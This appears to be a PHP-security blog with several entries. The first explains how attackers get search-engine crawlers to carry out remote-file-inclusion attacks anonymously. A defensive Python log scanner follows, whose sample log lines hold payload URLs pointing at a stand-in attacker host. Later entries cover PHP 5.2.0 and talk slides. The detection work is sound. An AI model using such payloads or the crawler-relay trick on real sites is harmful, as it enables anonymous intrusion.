There was a very interesting article posted on the Securiteam blog which talks about anonymizing code injection attacks. The approach is quite simple and yet rather ingenious: simply submit to Google the vulnerable application URL with the attack payload passed via the GET parameters. Within a short period of time Googlebot will dutifully try to index the URL, effectively executing the attack. Stefan had also explored this issue on his blog with some examples showing how to ensure more rapid indexing, so you wouldn't have to wait weeks for the exploit to be triggered. However, everybody seems to have focused on Google, which may be a bit unfair to them since other search engines suffer from the same kind of problems. For example, if we take MSN (Microsoft's Search) and run the "inurl:cmd.gif" query that the SecuriTeam folks used to test Google, we find a fair number of results. This tells us that hackers believe in equal opportunity and use MSN as much as Google to propagate their attacks. But there are...
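On the defensive side, this traffic shows up in the access log as a crawler user agent requesting a URL whose GET parameter value is itself an absolute URL. The following added example (not from the original post or the articles it cites) scans Apache combined-format log lines for that pattern; the log lines, IP addresses and `attacker.example` host are constructed, and the function names are illustrative.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# User-agent tokens for the two engines named above. A UA string can be
# spoofed; this only selects requests that claim to come from a crawler.
CRAWLER_TOKENS = ("googlebot", "msnbot")

# Apache "combined" access log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# A GET parameter whose decoded value is itself an absolute URL
# (e.g. page=http://host/cmd.gif?) is the payload shape to look for.
REMOTE_URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

def suspicious_params(target):
    """Names of query parameters whose percent-decoded value is an absolute URL."""
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    return [name for name, value in pairs if REMOTE_URL_RE.match(value.strip())]

def crawler_delivered_hits(lines):
    """Return (ip, crawler, target, params) for crawler requests carrying URL-valued parameters."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ua = m.group("ua").lower()
        crawler = next((t for t in CRAWLER_TOKENS if t in ua), None)
        params = suspicious_params(m.group("target"))
        if crawler and params:
            hits.append((m.group("ip"), crawler, m.group("target"), params))
    return hits

# Constructed sample lines (documentation IPs, example hosts), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Nov/2006:10:00:01 +0000] "GET /index.php?page=http://attacker.example/cmd.gif? HTTP/1.1" 200 512 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '192.0.2.20 - - [03/Nov/2006:10:05:12 +0000] "GET /view.php?lang=en&inc=http%3A%2F%2Fattacker.example%2Fcmd.gif%3F HTTP/1.1" 200 734 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"',
    '192.0.2.10 - - [03/Nov/2006:10:07:44 +0000] "GET /article.php?id=42 HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '198.51.100.7 - - [03/Nov/2006:10:09:30 +0000] "GET /index.php?page=http://attacker.example/cmd.gif? HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux i686) Firefox/2.0"',
]

if __name__ == "__main__":
    for hit in crawler_delivered_hits(SAMPLE_LOG):
        print(hit)
```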

Damien is continuing his very handy phpinfo() research work, this time focusing on the popularity of the different PHP extensions people utilize with PHP and some interesting configuration directives such as disable_functions. You can find the graphs and summaries here and here. A very interesting read to anyone writing or considering writing distributable applications that need to work in different PHP environments.

After an extremely long (IMO) release cycle the final version of PHP 5.2.0 was finally released yesterday morning. There are many new features, speed improvements and a fair number of security changes. You can read the official release announcement for a quick summary of the major changes, and the specifics can be found in a very long and somewhat boring to read changelog ;-) The bottom line is that all users of PHP 5.x should definitely upgrade, and 4.x users need to seriously start thinking about migrating as well, since we've finally got a 5 release that not only is feature complete but is also faster or at the minimum performs at the same speed as PHP 4.4. Big thanks to all the contributors who made patches, reported bugs and ran tests to hopefully make a solid release.

The slides for the Caching Systems talk are now available online; they can be downloaded here.

The slides from my talk on PHP Security are now up and can be found in PDF form at the bottom of my talks page. The talk was unfortunately rather short and I had to rush through a number of things, so my apologies if things felt a bit rushed, but I think the key points were hit and as far as an overall overview it was pretty good. Those interested in hearing more about security can review my slides from previous conferences that go into a bit more detail as far as the various security issues.